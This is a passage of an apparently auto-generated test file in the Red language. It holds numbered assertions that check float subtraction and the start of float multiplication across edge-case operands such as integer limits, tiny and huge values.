1E-4 --test-- "float-auto-262" fat-i: 0.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= -9.99999E-45 fat-k 1E-4 --test-- "float-auto-263" --assertf~= -7.7E+18 ( 0.0 - 7.7E+18 ) 1E-4 --test-- "float-auto-264" fat-i: 0.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-265" --assertf~= -2147483648.0 ( -2147483648.0 - 0.0 ) 1E-4 --test-- "float-auto-266" fat-i: -2147483648.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-267" --assertf~= 0.0 ( -2147483648.0 - -2147483648.0 ) 1E-4 --test-- "float-auto-268" fat-i: -2147483648.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-269" --assertf~= -4294967295.0 ( -2147483648.0 - 2147483647.0 ) 1E-4 --test-- "float-auto-270" fat-i: -2147483648.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -4294967295.0 fat-k 1E-4 --test-- "float-auto-271" --assertf~= -2147483647.0 ( -2147483648.0 - -1.0 ) 1E-4 --test-- "float-auto-272" fat-i: -2147483648.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-273" --assertf~= -2147483651.0 ( -2147483648.0 - 3.0 ) 1E-4 --test-- "float-auto-274" fat-i: -2147483648.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -2147483651.0 fat-k 1E-4 --test-- "float-auto-275" --assertf~= -2147483641.0 ( -2147483648.0 - -7.0 ) 1E-4 --test-- "float-auto-276" fat-i: -2147483648.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= -2147483641.0 fat-k 1E-4 --test-- "float-auto-277" --assertf~= -2147483653.0 ( -2147483648.0 - 5.0 ) 1E-4 --test-- "float-auto-278" fat-i: -2147483648.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -2147483653.0 fat-k 1E-4 --test-- "float-auto-279" --assertf~= -2147607104.789 ( -2147483648.0 - 123456.789 ) 1E-4 --test-- "float-auto-280" fat-i: -2147483648.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -2147607104.789 fat-k 1E-4 --test-- "float-auto-281" --assertf~= -1.222090944E+33 ( -2147483648.0 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-282" fat-i: -2147483648.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-283" --assertf~= -2147483648.0 ( -2147483648.0 - 9.99999E-45 ) 1E-4 --test-- "float-auto-284" fat-i: -2147483648.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-285" --assertf~= -7.70000000214748E+18 ( -2147483648.0 - 7.7E+18 ) 1E-4 --test-- "float-auto-286" fat-i: -2147483648.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.70000000214748E+18 fat-k 1E-4 --test-- "float-auto-287" --assertf~= 2147483647.0 ( 2147483647.0 - 0.0 ) 1E-4 --test-- "float-auto-288" fat-i: 2147483647.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-289" --assertf~= 4294967295.0 ( 2147483647.0 - -2147483648.0 ) 1E-4 --test-- "float-auto-290" fat-i: 2147483647.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 4294967295.0 fat-k 1E-4 --test-- "float-auto-291" --assertf~= 0.0 ( 2147483647.0 - 2147483647.0 ) 1E-4 --test-- "float-auto-292" fat-i: 2147483647.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-293" --assertf~= 2147483648.0 ( 2147483647.0 - -1.0 ) 1E-4 --test-- "float-auto-294" fat-i: 2147483647.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-295" --assertf~= 2147483644.0 ( 2147483647.0 - 3.0 ) 1E-4 --test-- "float-auto-296" fat-i: 2147483647.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 2147483644.0 fat-k 1E-4 --test-- "float-auto-297" --assertf~= 2147483654.0 ( 2147483647.0 - -7.0 ) 1E-4 --test-- "float-auto-298" fat-i: 2147483647.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 2147483654.0 fat-k 1E-4 --test-- "float-auto-299" --assertf~= 2147483642.0 ( 2147483647.0 - 5.0 ) 1E-4 --test-- "float-auto-300" fat-i: 2147483647.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 2147483642.0 fat-k 1E-4 --test-- "float-auto-301" --assertf~= 2147360190.211 ( 2147483647.0 - 123456.789 ) 1E-4 --test-- "float-auto-302" fat-i: 2147483647.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= 2147360190.211 fat-k 1E-4 --test-- "float-auto-303" --assertf~= -1.222090944E+33 ( 2147483647.0 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-304" fat-i: 2147483647.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-305" --assertf~= 2147483647.0 ( 2147483647.0 - 9.99999E-45 ) 1E-4 --test-- "float-auto-306" fat-i: 2147483647.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-307" --assertf~= -7.69999999785252E+18 ( 2147483647.0 - 7.7E+18 ) 1E-4 --test-- "float-auto-308" fat-i: 2147483647.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.69999999785252E+18 fat-k 1E-4 --test-- "float-auto-309" --assertf~= -1.0 ( -1.0 - 0.0 ) 1E-4 --test-- "float-auto-310" fat-i: -1.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-311" --assertf~= 2147483647.0 ( -1.0 - -2147483648.0 ) 1E-4 --test-- "float-auto-312" fat-i: -1.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-313" --assertf~= -2147483648.0 ( -1.0 - 2147483647.0 ) 1E-4 --test-- "float-auto-314" fat-i: -1.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-315" --assertf~= 0.0 ( -1.0 - -1.0 ) 1E-4 --test-- "float-auto-316" fat-i: -1.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-317" --assertf~= -4.0 ( -1.0 - 3.0 ) 1E-4 --test-- "float-auto-318" fat-i: -1.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -4.0 fat-k 1E-4 --test-- "float-auto-319" --assertf~= 6.0 ( -1.0 - -7.0 ) 1E-4 --test-- "float-auto-320" fat-i: -1.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 6.0 fat-k 1E-4 --test-- "float-auto-321" --assertf~= -6.0 ( -1.0 - 5.0 ) 1E-4 --test-- "float-auto-322" fat-i: -1.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -6.0 fat-k 1E-4 --test-- "float-auto-323" --assertf~= -123457.789 ( -1.0 - 123456.789 ) 1E-4 --test-- "float-auto-324" fat-i: -1.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123457.789 fat-k 1E-4 --test-- "float-auto-325" --assertf~= -1.222090944E+33 ( -1.0 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-326" fat-i: -1.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-327" --assertf~= -1.0 ( -1.0 - 9.99999E-45 ) 1E-4 --test-- "float-auto-328" fat-i: -1.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-329" --assertf~= -7.7E+18 ( -1.0 - 7.7E+18 ) 1E-4 --test-- "float-auto-330" fat-i: -1.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-331" --assertf~= 3.0 ( 3.0 - 0.0 ) 1E-4 --test-- "float-auto-332" fat-i: 3.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-333" --assertf~= 2147483651.0 ( 3.0 - -2147483648.0 ) 1E-4 --test-- "float-auto-334" fat-i: 3.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483651.0 fat-k 1E-4 --test-- "float-auto-335" --assertf~= -2147483644.0 ( 3.0 - 2147483647.0 ) 1E-4 --test-- "float-auto-336" fat-i: 3.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483644.0 fat-k 1E-4 --test-- "float-auto-337" --assertf~= 4.0 ( 3.0 - -1.0 ) 1E-4 --test-- "float-auto-338" fat-i: 3.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 4.0 fat-k 1E-4 --test-- "float-auto-339" --assertf~= 0.0 ( 3.0 - 3.0 ) 1E-4 --test-- "float-auto-340" fat-i: 3.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-341" --assertf~= 10.0 ( 3.0 - -7.0 ) 1E-4 --test-- "float-auto-342" fat-i: 3.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 10.0 fat-k 1E-4 --test-- "float-auto-343" --assertf~= -2.0 ( 3.0 - 5.0 ) 1E-4 --test-- "float-auto-344" fat-i: 3.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -2.0 fat-k 1E-4 --test-- "float-auto-345" --assertf~= -123453.789 ( 3.0 - 123456.789 ) 1E-4 --test-- "float-auto-346" fat-i: 3.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123453.789 fat-k 1E-4 --test-- "float-auto-347" --assertf~= -1.222090944E+33 ( 3.0 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-348" fat-i: 3.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-349" --assertf~= 3.0 ( 3.0 - 9.99999E-45 ) 1E-4 --test-- "float-auto-350" fat-i: 3.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-351" --assertf~= -7.7E+18 ( 3.0 - 7.7E+18 ) 1E-4 --test-- "float-auto-352" fat-i: 3.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-353" --assertf~= -7.0 ( -7.0 - 0.0 ) 1E-4 --test-- "float-auto-354" fat-i: -7.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-355" --assertf~= 2147483641.0 ( -7.0 - -2147483648.0 ) 1E-4 --test-- "float-auto-356" fat-i: -7.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483641.0 fat-k 1E-4 --test-- "float-auto-357" --assertf~= -2147483654.0 ( -7.0 - 2147483647.0 ) 1E-4 --test-- "float-auto-358" fat-i: -7.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483654.0 fat-k 1E-4 --test-- "float-auto-359" --assertf~= -6.0 ( -7.0 - -1.0 ) 1E-4 --test-- "float-auto-360" fat-i: -7.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= -6.0 fat-k 1E-4 --test-- "float-auto-361" --assertf~= -10.0 ( -7.0 - 3.0 ) 1E-4 --test-- "float-auto-362" fat-i: -7.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -10.0 fat-k 1E-4 --test-- "float-auto-363" --assertf~= 0.0 ( -7.0 - -7.0 ) 1E-4 --test-- "float-auto-364" fat-i: -7.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-365" --assertf~= -12.0 ( -7.0 - 5.0 ) 1E-4 --test-- "float-auto-366" fat-i: -7.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -12.0 fat-k 1E-4 --test-- "float-auto-367" --assertf~= -123463.789 ( -7.0 - 123456.789 ) 1E-4 --test-- "float-auto-368" fat-i: -7.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123463.789 fat-k 1E-4 --test-- "float-auto-369" --assertf~= -1.222090944E+33 ( -7.0 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-370" fat-i: -7.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-371" --assertf~= -7.0 ( -7.0 - 9.99999E-45 ) 1E-4 --test-- "float-auto-372" fat-i: -7.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-373" --assertf~= -7.7E+18 ( -7.0 - 7.7E+18 ) 1E-4 --test-- "float-auto-374" fat-i: -7.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-375" --assertf~= 5.0 ( 5.0 - 0.0 ) 1E-4 --test-- "float-auto-376" fat-i: 5.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-377" --assertf~= 2147483653.0 ( 5.0 - -2147483648.0 ) 1E-4 --test-- "float-auto-378" fat-i: 5.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483653.0 fat-k 1E-4 --test-- "float-auto-379" --assertf~= -2147483642.0 ( 5.0 - 2147483647.0 ) 1E-4 --test-- "float-auto-380" fat-i: 5.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483642.0 fat-k 1E-4 --test-- "float-auto-381" --assertf~= 6.0 ( 5.0 - -1.0 ) 1E-4 --test-- "float-auto-382" fat-i: 5.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 6.0 fat-k 1E-4 --test-- "float-auto-383" --assertf~= 2.0 ( 5.0 - 3.0 ) 1E-4 --test-- "float-auto-384" fat-i: 5.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 2.0 fat-k 1E-4 --test-- "float-auto-385" --assertf~= 12.0 ( 5.0 - -7.0 ) 1E-4 --test-- "float-auto-386" fat-i: 5.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 12.0 fat-k 1E-4 --test-- "float-auto-387" --assertf~= 0.0 ( 5.0 - 5.0 ) 1E-4 --test-- "float-auto-388" fat-i: 5.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-389" --assertf~= -123451.789 ( 5.0 - 123456.789 ) 1E-4 --test-- "float-auto-390" fat-i: 5.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123451.789 fat-k 1E-4 --test-- "float-auto-391" --assertf~= -1.222090944E+33 ( 5.0 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-392" fat-i: 5.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-393" --assertf~= 5.0 ( 5.0 - 9.99999E-45 ) 1E-4 --test-- "float-auto-394" fat-i: 5.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-395" --assertf~= -7.7E+18 ( 5.0 - 7.7E+18 ) 1E-4 --test-- "float-auto-396" fat-i: 5.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-397" --assertf~= 123456.789 ( 123456.789 - 0.0 ) 1E-4 --test-- "float-auto-398" fat-i: 123456.789 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-399" --assertf~= 2147607104.789 ( 123456.789 - -2147483648.0 ) 1E-4 --test-- "float-auto-400" fat-i: 123456.789 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147607104.789 fat-k 1E-4 --test-- "float-auto-401" --assertf~= -2147360190.211 ( 123456.789 - 2147483647.0 ) 1E-4 --test-- "float-auto-402" fat-i: 123456.789 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147360190.211 fat-k 1E-4 --test-- "float-auto-403" --assertf~= 123457.789 ( 123456.789 - -1.0 ) 1E-4 --test-- "float-auto-404" fat-i: 123456.789 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 123457.789 fat-k 1E-4 --test-- "float-auto-405" --assertf~= 123453.789 ( 123456.789 - 3.0 ) 1E-4 --test-- "float-auto-406" fat-i: 123456.789 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 123453.789 fat-k 1E-4 --test-- "float-auto-407" --assertf~= 123463.789 ( 123456.789 - -7.0 ) 1E-4 --test-- "float-auto-408" fat-i: 123456.789 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 123463.789 fat-k 1E-4 --test-- "float-auto-409" --assertf~= 123451.789 ( 123456.789 - 5.0 ) 1E-4 --test-- "float-auto-410" fat-i: 123456.789 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 123451.789 fat-k 1E-4 --test-- "float-auto-411" --assertf~= 0.0 ( 123456.789 - 123456.789 ) 1E-4 --test-- "float-auto-412" fat-i: 123456.789 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-413" --assertf~= -1.222090944E+33 ( 123456.789 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-414" fat-i: 123456.789 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-415" --assertf~= 123456.789 ( 123456.789 - 9.99999E-45 ) 1E-4 --test-- "float-auto-416" fat-i: 123456.789 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-417" --assertf~= -7.69999999999988E+18 ( 123456.789 - 7.7E+18 ) 1E-4 --test-- "float-auto-418" fat-i: 123456.789 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.69999999999988E+18 fat-k 1E-4 --test-- "float-auto-419" --assertf~= 1.222090944E+33 ( 1.222090944E+33 - 0.0 ) 1E-4 --test-- "float-auto-420" fat-i: 1.222090944E+33 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-421" --assertf~= 1.222090944E+33 ( 1.222090944E+33 - -2147483648.0 ) 1E-4 --test-- "float-auto-422" fat-i: 1.222090944E+33 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-423" --assertf~= 1.222090944E+33 ( 1.222090944E+33 - 2147483647.0 ) 1E-4 --test-- "float-auto-424" fat-i: 1.222090944E+33 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-425" --assertf~= 1.222090944E+33 ( 1.222090944E+33 - -1.0 ) 1E-4 --test-- "float-auto-426" fat-i: 1.222090944E+33 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-427" --assertf~= 1.222090944E+33 ( 1.222090944E+33 - 3.0 ) 1E-4 --test-- "float-auto-428" fat-i: 1.222090944E+33 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-429" --assertf~= 1.222090944E+33 ( 1.222090944E+33 - -7.0 ) 1E-4 --test-- "float-auto-430" fat-i: 1.222090944E+33 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-431" --assertf~= 1.222090944E+33 ( 1.222090944E+33 - 5.0 ) 1E-4 --test-- "float-auto-432" fat-i: 1.222090944E+33 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-433" --assertf~= 1.222090944E+33 ( 1.222090944E+33 - 123456.789 ) 1E-4 --test-- "float-auto-434" fat-i: 1.222090944E+33 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-435" --assertf~= 0.0 ( 1.222090944E+33 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-436" fat-i: 1.222090944E+33 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-437" --assertf~= 1.222090944E+33 ( 1.222090944E+33 - 9.99999E-45 ) 1E-4 --test-- "float-auto-438" fat-i: 1.222090944E+33 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-439" --assertf~= 1.22209094399999E+33 ( 1.222090944E+33 - 7.7E+18 ) 1E-4 --test-- "float-auto-440" fat-i: 1.222090944E+33 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= 1.22209094399999E+33 fat-k 1E-4 --test-- "float-auto-441" --assertf~= 9.99999E-45 ( 9.99999E-45 - 0.0 ) 1E-4 --test-- "float-auto-442" fat-i: 9.99999E-45 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 9.99999E-45 fat-k 1E-4 --test-- "float-auto-443" --assertf~= 2147483648.0 ( 9.99999E-45 - -2147483648.0 ) 1E-4 --test-- "float-auto-444" fat-i: 9.99999E-45 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-445" --assertf~= -2147483647.0 ( 9.99999E-45 - 2147483647.0 ) 1E-4 --test-- "float-auto-446" fat-i: 9.99999E-45 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-447" --assertf~= 1.0 ( 9.99999E-45 - -1.0 ) 1E-4 --test-- "float-auto-448" fat-i: 9.99999E-45 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-449" --assertf~= -3.0 ( 9.99999E-45 - 3.0 ) 1E-4 --test-- "float-auto-450" fat-i: 9.99999E-45 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-451" --assertf~= 7.0 ( 9.99999E-45 - -7.0 ) 1E-4 --test-- "float-auto-452" fat-i: 9.99999E-45 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-453" --assertf~= -5.0 ( 9.99999E-45 - 5.0 ) 1E-4 --test-- "float-auto-454" fat-i: 9.99999E-45 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-455" --assertf~= -123456.789 ( 9.99999E-45 - 123456.789 ) 1E-4 --test-- "float-auto-456" fat-i: 9.99999E-45 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-457" --assertf~= -1.222090944E+33 ( 9.99999E-45 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-458" fat-i: 9.99999E-45 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-459" --assertf~= 0.0 ( 9.99999E-45 - 9.99999E-45 ) 1E-4 --test-- "float-auto-460" fat-i: 9.99999E-45 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-461" --assertf~= -7.7E+18 ( 9.99999E-45 - 7.7E+18 ) 1E-4 --test-- "float-auto-462" fat-i: 9.99999E-45 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-463" --assertf~= 7.7E+18 ( 7.7E+18 - 0.0 ) 1E-4 --test-- "float-auto-464" fat-i: 7.7E+18 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-465" --assertf~= 7.70000000214748E+18 ( 7.7E+18 - -2147483648.0 ) 1E-4 --test-- "float-auto-466" fat-i: 7.7E+18 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 7.70000000214748E+18 fat-k 1E-4 --test-- "float-auto-467" --assertf~= 7.69999999785252E+18 ( 7.7E+18 - 2147483647.0 ) 1E-4 --test-- "float-auto-468" fat-i: 7.7E+18 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= 7.69999999785252E+18 fat-k 1E-4 --test-- "float-auto-469" --assertf~= 7.7E+18 ( 7.7E+18 - -1.0 ) 1E-4 --test-- "float-auto-470" fat-i: 7.7E+18 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-471" --assertf~= 7.7E+18 ( 7.7E+18 - 3.0 ) 1E-4 --test-- "float-auto-472" fat-i: 7.7E+18 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-473" --assertf~= 7.7E+18 ( 7.7E+18 - -7.0 ) 1E-4 --test-- "float-auto-474" fat-i: 7.7E+18 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-475" --assertf~= 7.7E+18 ( 7.7E+18 - 5.0 ) 1E-4 --test-- "float-auto-476" fat-i: 7.7E+18 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-477" --assertf~= 7.69999999999988E+18 ( 7.7E+18 - 123456.789 ) 1E-4 --test-- "float-auto-478" fat-i: 7.7E+18 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= 7.69999999999988E+18 fat-k 1E-4 --test-- "float-auto-479" --assertf~= -1.22209094399999E+33 ( 7.7E+18 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-480" fat-i: 7.7E+18 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.22209094399999E+33 fat-k 1E-4 --test-- "float-auto-481" --assertf~= 7.7E+18 ( 7.7E+18 - 9.99999E-45 ) 1E-4 --test-- "float-auto-482" fat-i: 7.7E+18 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-483" --assertf~= 0.0 ( 7.7E+18 - 7.7E+18 ) 1E-4 --test-- "float-auto-484" fat-i: 7.7E+18 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-485" --assertf~= 0.0 ( 0.0 * 0.0 ) 1E-4 --test-- "float-auto-486" fat-i: 0.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-487" --assertf~= 0.0 ( 0.0 * -2147483648.0 ) 1E-4 --test-- "float-auto-488" fat-i: 0.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-489" --assertf~= 0.0 ( 0.0 * 2147483647.0 ) 1E-4 --test-- "float-auto-490" fat-i: 0.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-491" --assertf~= 0.0 ( 0.0 * -1.0 ) 1E-4 --test-- "float-auto-492" fat-i: 0.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-493" --assertf~= 0.0 ( 0.0 * 3.0 ) 1E-4 --test-- "float-auto-494" fat-i: 0.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-495" --assertf~= 0.0 ( 0.0 * -7.0 ) 1E-4 --test-- "float-auto-496" fat-i: 0.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-497" --assertf~= 0.0 ( 0.0 * 5.0 ) 1E-4 --test-- "float-auto-498" fat-i: 0.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-499" --assertf~= 0.0 ( 0.0 * 123456.789 ) 1E-4 --test-- "float-auto-500" fat-i: 0.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-501" --assertf~= 0.0 ( 0.0 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-502" fat-i: 0.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-503" --assertf~= 0.0 ( 0.0 * 9.99999E-45 ) 1E-4 --test-- "float-auto-504" fat-i: 0.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-505" --assertf~= 0.0 ( 0.0 * 7.7E+18 ) 1E-4 --test-- "float-auto-506" fat-i: 0.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j 